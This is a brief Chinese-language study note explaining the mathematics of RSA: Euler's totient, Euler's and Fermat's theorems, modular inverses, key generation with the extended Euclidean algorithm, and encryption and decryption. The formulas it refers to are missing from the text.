欧拉函数：用于计算任意正整数 n，在 <=n 的正整数中，与 n 互质的正整数个数。
欧拉定理：如果两个正整数 a 和 n 互质，则如下等式成立。
费马小定理：欧拉函数中的一个特殊情况，如果 n 是质数，而 a 不是 n 的倍数，此时 a 和 n 必然互质。因为n的欧拉函数值 = n-1
模反元素：如果两个正整数 a 和 n 互质，那么一定可以找到一个正整数 b，使得 ab - 1 被 n 整除。这个时候，b 就叫做 a 的模反元素。

关键参数

(e,n)：公钥

(d,n)：私钥

p,q：n=p*q ，p和q都是两个大素数

c：密文

m：明文

n,e是公开的情况下，想要知道d的值，必须要将n分解计算出n的欧拉函数值，而n是两个大素数p，q的乘积，将其分解是困难的。

生成密钥

取两个大质数p,q，并计算他们的乘积n，一般要求n换算成二进制要大于2048位

则根据欧拉定理满足以下条件（欧拉函数）：

计算n的欧拉函数值

选择一个数e使得e与n的欧拉函数值互质，一般选择65537

计算e相对n的欧拉函数值的模反元素d，因为e与n的欧拉函数值互质，则根据模反元素的性质

根据扩展欧几里得算法，通过迭代求解即可解出d，随后即生成公钥(e,N)，私钥(d,N)

加解密的实现

加密：

m为要加密的信息，(e,n)组合起来为公钥，c和k分别为常数

解密：

m为要解密的信息，(d,n)组合起来为私钥，c和k分别为常数

两个公式可相互推导